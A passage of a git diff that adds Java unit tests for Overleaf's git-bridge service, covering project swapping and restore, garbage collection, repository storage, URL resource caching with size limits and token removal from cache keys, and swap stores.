dbStore.getOldestUnswappedProject()); + dbStore.setLastAccessedTime("older", Timestamp.valueOf(LocalDateTime.now())); + assertEquals("asdf", dbStore.getOldestUnswappedProject()); + } + + @Test + public void swapAndRestore() { + String projectName = "something"; + String compression = "bzip2"; + dbStore.setLatestVersionForProject(projectName, 42); + dbStore.swap(projectName, compression); + assertNull(dbStore.getOldestUnswappedProject()); + assertEquals(dbStore.getSwapCompression(projectName), compression); + // and restore + dbStore.restore(projectName); + assertEquals(dbStore.getSwapCompression(projectName), null); + } + + @Test + public void noOldestProjectIfAllEvicted() { + dbStore.setLatestVersionForProject("older", 3); + dbStore.swap("older", "bzip2"); + assertNull(dbStore.getOldestUnswappedProject()); + } + + @Test + public void nullLastAccessedTimesDoNotCount() { + dbStore.setLatestVersionForProject("older", 2); + dbStore.setLastAccessedTime( + "older", Timestamp.valueOf(LocalDateTime.now().minus(5, ChronoUnit.SECONDS))); + dbStore.setLatestVersionForProject("newer", 3); + dbStore.setLastAccessedTime("newer", Timestamp.valueOf(LocalDateTime.now())); + assertEquals("older", dbStore.getOldestUnswappedProject()); + dbStore.swap("older", "bzip2"); + assertEquals("newer", dbStore.getOldestUnswappedProject()); + } + + @Test + public void missingProjectLastAccessedTimeCanBeSet() { + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.setLastAccessedTime("asdf", Timestamp.valueOf(LocalDateTime.now())); + assertEquals("asdf", dbStore.getOldestUnswappedProject()); + } + + @Test + public void testGetNumUnswappedProjects() { + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.setLastAccessedTime("asdf", Timestamp.valueOf(LocalDateTime.now())); + assertEquals(1, dbStore.getNumUnswappedProjects()); + dbStore.swap("asdf", "bzip2"); + assertEquals(0, dbStore.getNumUnswappedProjects()); + } + + @Test + public void projectStateIsNotPresentIfNotInDBAtAll() { + assertEquals(ProjectState.NOT_PRESENT, dbStore.getProjectState("asdf")); + } + + @Test + public void projectStateIsPresentIfProjectHasLastAccessed() { + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.setLastAccessedTime("asdf", Timestamp.valueOf(LocalDateTime.now())); + assertEquals(ProjectState.PRESENT, dbStore.getProjectState("asdf")); + } + + @Test + public void projectStateIsSwappedIfLastAccessedIsNull() { + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.swap("asdf", "bzip2"); + assertEquals(ProjectState.SWAPPED, dbStore.getProjectState("asdf")); + } + + @Test + public void testDeleteProject() { + dbStore.setLatestVersionForProject("project1", 1); + dbStore.setLatestVersionForProject("project2", 1); + assertEquals(ProjectState.PRESENT, dbStore.getProjectState("project1")); + assertEquals(ProjectState.PRESENT, dbStore.getProjectState("project2")); + dbStore.deleteProject("project1"); + assertEquals(ProjectState.NOT_PRESENT, dbStore.getProjectState("project1")); + assertEquals(ProjectState.PRESENT, dbStore.getProjectState("project2")); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdateTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdateTest.java new file mode 100644 index 0000000..03919bf --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdateTest.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete; + +import static org.junit.Assert.*; + +import org.junit.Test; + +public class DeleteFilesForProjectSQLUpdateTest { + + @Test + public void testGetSQL() { + DeleteFilesForProjectSQLUpdate update = + new DeleteFilesForProjectSQLUpdate("projname", "path1", "path2"); + assertEquals( + "DELETE FROM `url_index_store` " + "WHERE `project_name` = ? " + "AND path IN (?, ?);\n", + update.getSQL()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImplTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImplTest.java new file mode 100644 index 0000000..fef30e7 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImplTest.java @@ -0,0 +1,119 @@ +package uk.ac.ic.wlgitbridge.bridge.gc; + +import static org.junit.Assert.assertFalse; +import static org.mockito.Mockito.*; + +import java.io.IOException; +import java.util.List; +import java.util.concurrent.CompletableFuture; +import java.util.stream.Collectors; +import java.util.stream.IntStream; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.mockito.stubbing.OngoingStubbing; +import uk.ac.ic.wlgitbridge.bridge.lock.LockGuard; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.ProjectRepo; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.data.ProjectLockImpl; + +/* + * Created by winston on 16/02/2017. + */ +public class GcJobImplTest { + + RepoStore repoStore = mock(RepoStore.class); + + ProjectLock locks; + + GcJobImpl gcJob; + + @Before + public void setup() { + locks = new ProjectLockImpl(); + gcJob = new GcJobImpl(repoStore, locks, 5); + } + + @After + public void teardown() { + gcJob.stop(); + } + + @Test + public void addedProjectsAreAllEventuallyGcedOnce() throws Exception { + int numProjects = 5; + /* Make the mocks, make expectations, and keep a reference to them */ + final OngoingStubbing<ProjectRepo>[] o = + new OngoingStubbing[] {when(repoStore.getExistingRepo(anyString()))}; + List<ProjectRepo> mockRepos = + IntStream.range(0, numProjects) + .mapToObj(i -> String.valueOf((char) ('a' + i))) + .map( + proj -> { + gcJob.queueForGc(proj); + ProjectRepo mockRepo = mock(ProjectRepo.class); + o[0] = o[0].thenReturn(mockRepo); + return mockRepo; + }) + .collect(Collectors.toList()); + CompletableFuture<Void> fut = gcJob.waitForRun(); + gcJob.start(); + fut.join(); + for (ProjectRepo mock : mockRepos) { + verify(mock).runGC(); + verify(mock).deleteIncomingPacks(); + } + /* Nothing should happen on the next run */ + when(repoStore.getExistingRepo(anyString())).thenThrow(new IllegalStateException()); + gcJob.waitForRun().join(); + } + + @Test + public void cannotOverlapGcRuns() throws Exception { + CompletableFuture<Void> runningForever = new CompletableFuture<>(); + gcJob.onPostGc( + () -> { + try { + /* Pretend the GC is taking forever */ + runningForever.join(); + } catch (Throwable e) { + runningForever.completeExceptionally(e); + } + }); + CompletableFuture<Void> fut = gcJob.waitForRun(); + gcJob.start(); + fut.join(); + CompletableFuture<Void> ranAgain = new CompletableFuture<>(); + gcJob.onPreGc(() -> ranAgain.complete(null)); + /* Should not run again any time soon */ + for (int i = 0; i < 50; ++i) { + assertFalse(ranAgain.isDone()); + /* The gc interval is 5 ms, so 50 1ms sleeps should be more than + enough without making the test slow */ + Thread.sleep(1); + } + assertFalse(runningForever.isCompletedExceptionally()); + } + + @Test + public void willNotGcProjectUntilItIsUnlocked() throws InterruptedException, IOException { + ProjectRepo repo = mock(ProjectRepo.class); + when(repoStore.getExistingRepo(anyString())).thenReturn(repo); + gcJob.onPostGc(gcJob::stop); + gcJob.queueForGc("a"); + CompletableFuture<Void> fut = gcJob.waitForRun(); + try (LockGuard __ = locks.lockGuard("a")) { + gcJob.start(); + for (int i = 0; i < 50; ++i) { + assertFalse(fut.isDone()); + Thread.sleep(1); + } + } catch (CannotAcquireLockException e) { + throw new RuntimeException(e); + } + /* Now that we've released the lock, fut should complete */ + fut.join(); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest.java new file mode 100644 index 0000000..0e4b01f --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest.java @@ -0,0 +1,80 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import static org.junit.Assert.*; + +import java.io.*; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.Arrays; +import java.util.Optional; +import org.apache.commons.io.FileUtils; +import org.junit.Before; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.util.Files; + +/* + * Created by winston on 23/08/2016. + */ +public class FSGitRepoStoreTest { + + public static File makeTempRepoDir(TemporaryFolder tmpFolder, String name) throws IOException { + File tmp = tmpFolder.newFolder(name); + Path rootdir = + Paths.get( + "src/test/resources/uk/ac/ic/wlgitbridge/" + "bridge/repo/FSGitRepoStoreTest/rootdir"); + FileUtils.copyDirectory(rootdir.toFile(), tmp); + Files.renameAll(tmp, "DOTgit", ".git"); + return tmp; + } + + private FSGitRepoStore repoStore; + private File original; + + @Before + public void setup() throws IOException { + TemporaryFolder tmpFolder = new TemporaryFolder(); + tmpFolder.create(); + File tmp = makeTempRepoDir(tmpFolder, "rootdir"); + original = tmpFolder.newFolder("original"); + FileUtils.copyDirectory(tmp, original); + repoStore = new FSGitRepoStore(tmp.getAbsolutePath(), Optional.empty()); + } + + @Test + public void testPurgeNonexistentProjects() { + File toDelete = new File(repoStore.getRootDirectory(), "idontexist"); + File wlgb = new File(repoStore.getRootDirectory(), ".wlgb"); + assertTrue(toDelete.exists()); + assertTrue(wlgb.exists()); + repoStore.purgeNonexistentProjects(Arrays.asList("proj1", "proj2")); + assertFalse(toDelete.exists()); + assertTrue(wlgb.exists()); + } + + @Test + public void totalSizeShouldChangeWhenFilesAreCreatedAndDeleted() throws IOException { + long old = repoStore.totalSize(); + File temp = new File(repoStore.getRootDirectory(), "__temp.txt"); + try (OutputStream out = new FileOutputStream(temp)) { + out.write(new byte[16 * 1024 * 1024]); + } + long new_ = repoStore.totalSize(); + assertTrue(new_ > old); + assertTrue(temp.delete()); + long new__ = repoStore.totalSize(); + assertTrue(new__ < new_); + } + + @Test + public void zipAndUnzipShouldBeTheSame() throws IOException { + File expected = new File(original, "proj1"); + File actual = new File(repoStore.getRootDirectory(), "proj1"); + assertTrue(Files.contentsAreEqual(expected, actual)); + InputStream zipped = repoStore.bzip2Project("proj1"); + repoStore.remove("proj1"); + assertFalse(actual.exists()); + repoStore.unbzip2Project("proj1", zipped); + assertTrue(Files.contentsAreEqual(expected, actual)); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest.java new file mode 100644 index 0000000..7222203 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest.java @@ -0,0 +1,172 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.lessThan; +import static org.junit.Assert.*; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.File; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.*; +import java.util.function.Supplier; +import org.apache.commons.io.FileUtils; +import org.junit.Before; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.data.filestore.RepositoryFile; +import uk.ac.ic.wlgitbridge.snapshot.servermock.util.FileUtil; +import uk.ac.ic.wlgitbridge.util.Files; + +/* + * Created by winston on 08/10/2016. + */ +public class GitProjectRepoTest { + + public static File makeTempRepoDir(TemporaryFolder tmpFolder, String name) throws IOException { + File tmp = tmpFolder.newFolder(name); + Path rootdir = + Paths.get( + "src/test/resources/uk/ac/ic/wlgitbridge/" + "bridge/repo/GitProjectRepoTest/rootdir"); + FileUtils.copyDirectory(rootdir.toFile(), tmp); + Files.renameAll(tmp, "DOTgit", ".git"); + return tmp; + } + + private File rootdir; + FSGitRepoStore repoStore; + GitProjectRepo repo; + GitProjectRepo badGitignore; + GitProjectRepo incoming; + GitProjectRepo withoutIncoming; + + @Rule public TemporaryFolder tmpFolder = new TemporaryFolder(); + + @Before + public void setup() throws IOException { + rootdir = makeTempRepoDir(tmpFolder, "rootdir"); + repoStore = new FSGitRepoStore(rootdir.getAbsolutePath(), Optional.empty()); + repo = fromExistingDir("repo"); + badGitignore = fromExistingDir("badgitignore"); + incoming = fromExistingDir("incoming"); + withoutIncoming = fromExistingDir("without_incoming"); + } + + private GitProjectRepo fromExistingDir(String dir) throws IOException { + GitProjectRepo ret = GitProjectRepo.fromName(dir); + ret.useExistingRepository(repoStore); + return ret; + } + + private GitDirectoryContents makeDirContents(String... contents) { + Preconditions.checkArgument(contents.length % 2 == 0); + List<RawFile> files = new ArrayList<>(contents.length / 2); + for (int i = 0; i + 1 < contents.length; i += 2) { + files.add(new RepositoryFile(contents[i], contents[i + 1].getBytes(StandardCharsets.UTF_8))); + } + return new GitDirectoryContents( + files, + repoStore.getRootDirectory(), + "repo", + "Winston Li", + "git@winston.li", + "Commit Message", + new Date()); + } + + @Test + public void deletingIgnoredFileOnAppDeletesFromTheRepo() throws IOException { + GitDirectoryContents contents = makeDirContents(".gitignore", "*.ignored\n"); + repo.commitAndGetMissing(contents); + repo.resetHard(); + File dir = repo.getDotGitDir(); + assertEquals( + new HashSet<String>(Arrays.asList(".git", ".gitignore")), + new HashSet<String>(Arrays.asList(dir.list()))); + } + + @Test + public void addingIgnoredFilesOnAppAddsToTheRepo() throws IOException { + GitDirectoryContents contents = + makeDirContents( + ".gitignore", + "*.ignored\n", + "file1.ignored", + "", + "file1.txt", + "", + "file2.txt", + "", + "added.ignored", + ""); + repo.commitAndGetMissing(contents); + repo.resetHard(); + assertEquals( + new HashSet<String>( + Arrays.asList( + ".git", ".gitignore", "file1.ignored", "file1.txt", "file2.txt", "added.ignored")), + new HashSet<String>(Arrays.asList(repo.getDotGitDir().list()))); + } + + @Test + public void badGitignoreShouldNotThrow() throws IOException { + GitDirectoryContents contents = + makeDirContents( + ".gitignore", + "*.ignored\n", + "file1.ignored", + "", + "file1.txt", + "", + "file2.txt", + "", + "added.ignored", + ""); + badGitignore.commitAndGetMissing(contents); + } + + private static long repoSize(ProjectRepo repo) { + return FileUtils.sizeOfDirectory(repo.getProjectDir()); + } + + @Test + public void runGCReducesTheSizeOfARepoWithGarbage() throws IOException { + long beforeSize = repoSize(repo); + repo.runGC(); + long afterSize = repoSize(repo); + assertThat(beforeSize, lessThan(afterSize)); + } + + @Test + public void runGCDoesNothingOnARepoWithoutGarbage() throws IOException { + repo.runGC(); + long beforeSize = repoSize(repo); + repo.runGC(); + long afterSize = repoSize(repo); + assertThat(beforeSize, equalTo(afterSize)); + } + + @Test + public void deleteIncomingPacksDeletesIncomingPacks() throws IOException { + Supplier<Boolean> dirsAreEq = + () -> + FileUtil.directoryDeepEquals(incoming.getProjectDir(), withoutIncoming.getProjectDir()); + assertFalse(dirsAreEq.get()); + incoming.deleteIncomingPacks(); + assertTrue(dirsAreEq.get()); + } + + @Test + public void deleteIncomingPacksOnDirWithoutIncomingPacksDoesNothing() throws IOException { + File actual = withoutIncoming.getProjectDir(); + File expected = tmpFolder.newFolder(); + FileUtils.copyDirectory(actual, expected); + withoutIncoming.deleteIncomingPacks(); + assertTrue(FileUtil.directoryDeepEquals(actual, expected)); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCacheTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCacheTest.java new file mode 100644 index 0000000..f49822a --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCacheTest.java @@ -0,0 +1,118 @@ +package uk.ac.ic.wlgitbridge.bridge.resource; + +import static org.mockito.ArgumentMatchers.any; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.verify; +import static org.mockito.Mockito.when; + +import io.netty.handler.codec.http.DefaultHttpHeaders; +import io.netty.handler.codec.http.HttpHeaders; +import java.io.IOException; +import java.util.HashMap; +import java.util.Optional; +import java.util.concurrent.ExecutionException; +import org.junit.Test; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.util.CastUtil; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; +import uk.ac.ic.wlgitbridge.io.http.ning.NingHttpClientFacade; +import uk.ac.ic.wlgitbridge.util.FunctionT; + +public class UrlResourceCacheTest { + + private static String PROJ = "proj"; + + private static String URL = "http://localhost/file.jpg"; + + private static String NEW_PATH = "file1.jpg"; + + private final NingHttpClientFacade http = mock(NingHttpClientFacade.class); + + private final DBStore dbStore = mock(DBStore.class); + + private final UrlResourceCache cache = new UrlResourceCache(dbStore, http); + + private static HttpHeaders withContentLength(long cl) { + return new DefaultHttpHeaders().add("Content-Length", String.valueOf(cl)); + } + + private void respondWithContentLength(long cl, long actual) throws ExecutionException { + when(http.get(any(), any())) + .thenAnswer( + invoc -> { + Object[] args = invoc.getArguments(); + //noinspection unchecked + ((FunctionT<HttpHeaders, Boolean, SizeLimitExceededException>) args[1]) + .apply(withContentLength(cl)); + return new byte[CastUtil.assumeInt(actual)]; + }); + } + + private void respondWithContentLength(long cl) throws ExecutionException { + respondWithContentLength(cl, cl); + } + + private void getWithMaxLength(Optional<Long> max) throws IOException, SizeLimitExceededException { + cache.get(PROJ, URL, NEW_PATH, new HashMap<>(), new HashMap<>(), max); + } + + private void getUrl(String url) throws IOException, SizeLimitExceededException { + cache.get(PROJ, url, NEW_PATH, new HashMap<>(), new HashMap<>(), Optional.empty()); + } + + private void getWithMaxLength(long max) throws IOException, SizeLimitExceededException { + getWithMaxLength(Optional.of(max)); + } + + private void getWithoutLimit() throws IOException, SizeLimitExceededException { + getWithMaxLength(Optional.empty()); + } + + @Test + public void getDoesNotThrowWhenContentLengthLT() throws Exception { + respondWithContentLength(1); + getWithMaxLength(2); + } + + @Test + public void getDoesNotThrowWhenContentLengthEQ() throws Exception { + respondWithContentLength(2); + getWithMaxLength(2); + } + + @Test(expected = SizeLimitExceededException.class) + public void getThrowsSizeLimitExceededWhenContentLengthGT() throws Exception { + respondWithContentLength(3); + getWithMaxLength(2); + } + + @Test + public void getWithEmptyContentIsValid() throws Exception { + respondWithContentLength(0); + getWithMaxLength(0); + } + + @Test + public void getWithoutLimitDoesNotThrow() throws Exception { + respondWithContentLength(Integer.MAX_VALUE, 0); + getWithoutLimit(); + } + + @Test(expected = SizeLimitExceededException.class) + public void getThrowsIfActualContentTooBig() throws Exception { + respondWithContentLength(0, 10); + getWithMaxLength(5); + } + + @Test + public void tokenIsRemovedFromCacheKey() throws Exception { + String url = + "http://history.overleaf.com/projects/1234/blobs/abdef?token=secretencryptedstuff&_path=test.tex"; + String cacheKey = + "http://history.overleaf.com/projects/1234/blobs/abdef?token=REMOVED&_path=test.tex"; + respondWithContentLength(123); + getUrl(url); + verify(dbStore).getPathForURLInProject(PROJ, cacheKey); + verify(dbStore).addURLIndexForProject(PROJ, cacheKey, NEW_PATH); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImplTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImplTest.java new file mode 100644 index 0000000..3956d28 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImplTest.java @@ -0,0 +1,170 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.job; + +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertTrue; + +import java.io.IOException; +import java.sql.Timestamp; +import java.time.Duration; +import java.time.LocalDateTime; +import java.time.temporal.ChronoUnit; +import org.apache.commons.io.FileUtils; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SqliteDBStore; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.FSGitRepoStore; +import uk.ac.ic.wlgitbridge.bridge.repo.FSGitRepoStoreTest; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.swap.store.InMemorySwapStore; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.data.ProjectLockImpl; + +/* + * Created by winston on 20/08/2016. + */ +public class SwapJobImplTest { + + private SwapJobImpl swapJob; + + private ProjectLock lock; + private RepoStore repoStore; + private DBStore dbStore; + private SwapStore swapStore; + + @Before + public void setup() throws IOException { + TemporaryFolder tmpFolder = new TemporaryFolder(); + tmpFolder.create(); + lock = new ProjectLockImpl(); + repoStore = + new FSGitRepoStore( + FSGitRepoStoreTest.makeTempRepoDir(tmpFolder, "repostore").getAbsolutePath(), + 100_000, + FileUtils::sizeOfDirectory); + dbStore = new SqliteDBStore(tmpFolder.newFile()); + dbStore.setLatestVersionForProject("proj1", 0); + dbStore.setLatestVersionForProject("proj2", 0); + dbStore.setLastAccessedTime("proj1", Timestamp.valueOf(LocalDateTime.now())); + dbStore.setLastAccessedTime( + "proj2", Timestamp.valueOf(LocalDateTime.now().minus(1, ChronoUnit.SECONDS))); + swapStore = new InMemorySwapStore(); + swapJob = + new SwapJobImpl( + 1, + 15000, + 30000, + Duration.ofMillis(100), + SwapJob.CompressionMethod.Bzip2, + lock, + repoStore, + dbStore, + swapStore); + } + + @After + public void teardown() { + if (swapJob != null) { + swapJob.stop(); + } + } + + private void waitASecond() { + try { + Thread.sleep(1 * 1000); + } catch (Exception _e) { + } + } + + @Test + public void startingTimerAlwaysCausesASwap() { + swapJob.lowWatermarkBytes = 16384; + swapJob.interval = Duration.ofHours(1); + assertEquals(0, swapJob.swaps.get()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() <= 0); + assertTrue(swapJob.swaps.get() > 0); + } + + @Test + public void swapsHappenEveryInterval() { + swapJob.lowWatermarkBytes = 16384; + assertEquals(0, swapJob.swaps.get()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() <= 1); + assertTrue(swapJob.swaps.get() > 1); + } + + @Test + public void noProjectsGetSwappedWhenUnderHighWatermark() { + swapJob.highWatermarkBytes = 65536; + assertEquals(2, dbStore.getNumUnswappedProjects()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() < 1); + assertEquals(2, dbStore.getNumUnswappedProjects()); + } + + @Test + public void correctProjGetSwappedWhenOverHighWatermark() throws IOException { + swapJob.lowWatermarkBytes = 16384; + assertEquals(2, dbStore.getNumUnswappedProjects()); + assertEquals("proj2", dbStore.getOldestUnswappedProject()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() < 1); + assertEquals(1, dbStore.getNumUnswappedProjects()); + assertEquals("proj1", dbStore.getOldestUnswappedProject()); + assertEquals("bzip2", dbStore.getSwapCompression("proj2")); + swapJob.restore("proj2"); + assertEquals(null, dbStore.getSwapCompression("proj2")); + int numSwaps = swapJob.swaps.get(); + do { + waitASecond(); + } while (swapJob.swaps.get() <= numSwaps); + assertEquals(1, dbStore.getNumUnswappedProjects()); + assertEquals("proj2", dbStore.getOldestUnswappedProject()); + } + + @Test + public void swapCompressionGzip() throws IOException { + swapJob = + new SwapJobImpl( + 1, + 15000, + 30000, + Duration.ofMillis(100), + SwapJob.CompressionMethod.Gzip, + lock, + repoStore, + dbStore, + swapStore); + swapJob.lowWatermarkBytes = 16384; + assertEquals(2, dbStore.getNumUnswappedProjects()); + assertEquals("proj2", dbStore.getOldestUnswappedProject()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() < 1); + assertEquals(1, dbStore.getNumUnswappedProjects()); + assertEquals("proj1", dbStore.getOldestUnswappedProject()); + assertEquals("gzip", dbStore.getSwapCompression("proj2")); + swapJob.restore("proj2"); + assertEquals(null, dbStore.getSwapCompression("proj2")); + int numSwaps = swapJob.swaps.get(); + do { + waitASecond(); + } while (swapJob.swaps.get() <= numSwaps); + assertEquals(1, dbStore.getNumUnswappedProjects()); + assertEquals("proj2", dbStore.getOldestUnswappedProject()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStoreTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStoreTest.java new file mode 100644 index 0000000..a5a9f39 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStoreTest.java @@ -0,0 +1,56 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import static org.junit.Assert.assertArrayEquals; + +import java.io.ByteArrayInputStream; +import java.io.IOException; +import org.apache.commons.io.IOUtils; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.ExpectedException; + +/* + * Created by winston on 23/08/2016. + */ +public class InMemorySwapStoreTest { + + private final InMemorySwapStore swapStore = new InMemorySwapStore(); + + @Rule public final ExpectedException exception = ExpectedException.none(); + + @Test + public void downloadingNonExistentFileThrows() { + exception.expect(IllegalArgumentException.class); + swapStore.openDownloadStream("asdf"); + } + + @Test + public void canDownloadUploadedFiles() throws IOException { + byte[] proj1Contents = "helloproj1".getBytes(); + byte[] proj2Contents = "asdfproj2".getBytes(); + swapStore.upload("proj1", new ByteArrayInputStream(proj1Contents), proj1Contents.length); + swapStore.upload("proj2", new ByteArrayInputStream(proj2Contents), proj2Contents.length); + assertArrayEquals(proj1Contents, IOUtils.toByteArray(swapStore.openDownloadStream("proj1"))); + assertArrayEquals(proj2Contents, IOUtils.toByteArray(swapStore.openDownloadStream("proj2"))); + } + + @Test + public void uploadingForTheSameProjectOverwritesTheFile() throws IOException { + byte[] proj1Contents = "helloproj1".getBytes(); + byte[] proj1NewContents = "goodbyeproj1".getBytes(); + swapStore.upload("proj1", new ByteArrayInputStream(proj1Contents), proj1Contents.length); + assertArrayEquals(proj1Contents, IOUtils.toByteArray(swapStore.openDownloadStream("proj1"))); + swapStore.upload("proj1", new ByteArrayInputStream(proj1NewContents), proj1NewContents.length); + assertArrayEquals(proj1NewContents, IOUtils.toByteArray(swapStore.openDownloadStream("proj1"))); + } + + @Test + public void canRemoveFiles() throws IOException { + byte[] projContents = "total garbage".getBytes(); + swapStore.upload("proj", new ByteArrayInputStream(projContents), projContents.length); + assertArrayEquals(projContents, IOUtils.toByteArray(swapStore.openDownloadStream("proj"))); + swapStore.remove("proj"); + exception.expect(IllegalArgumentException.class); + swapStore.openDownloadStream("proj"); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStoreTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStoreTest.java new file mode 100644 index 0000000..3bbdfe0 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStoreTest.java @@ -0,0 +1,42 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import org.junit.Before; + +/* + * Created by winston on 21/08/2016. + */ +public class S3SwapStoreTest { + + private static final String accessKey = null; + private static final String secret = null; + private static final String bucketName = "com.overleaf.testbucket"; + private static final String region = "us-east-1"; + + private S3SwapStore s3; + + @Before + public void setup() { + if (accessKey == null || secret == null) { + s3 = null; + return; + } + s3 = new S3SwapStore(accessKey, secret, bucketName, region); + } + + // @Ignore + // @Test + // public void testUploadDownloadDelete() throws Exception { + // assumeNotNull(s3); + // String projName = "abc123"; + // byte[] contents = "hello".getBytes(); + // s3.upload( + // projName, + // new ByteArrayInputStream(contents), + // contents.length + // ); + // InputStream down = s3.openDownloadStream(projName); + // s3.remove(projName); + // assertArrayEquals(contents, IOUtils.toByteArray(down)); + // } + +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/data/model/ResourceFetcherTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/data/model/ResourceFetcherTest.java new file mode 100644 index 0000000..1f27966 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/data/model/ResourceFetcherTest.java @@ -0,0 +1,74 @@ +package uk.ac.ic.wlgitbridge.data.model; + +import static org.junit.Assert.assertEquals; +import static org.mockserver.model.HttpRequest.request; +import static org.mockserver.model.HttpResponse.response; + +import java.io.IOException; +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; +import org.jmock.Expectations; +import org.jmock.Mockery; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import org.mockserver.client.MockServerClient; +import org.mockserver.junit.MockServerRule; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.repo.FSGitRepoStore; +import uk.ac.ic.wlgitbridge.bridge.repo.ProjectRepo; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.resource.ResourceCache; +import uk.ac.ic.wlgitbridge.bridge.resource.UrlResourceCache; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; + +/* + * Created by m on 20/11/15. + */ +public class ResourceFetcherTest { + @Rule public MockServerRule mockServerRule = new MockServerRule(this); + + private MockServerClient mockServerClient; + + @Test + public void fetchesFilesThatAreMissingFromUrlStoreCache() throws IOException, GitUserException { + final String testProjectName = "123abc"; + final String testUrl = 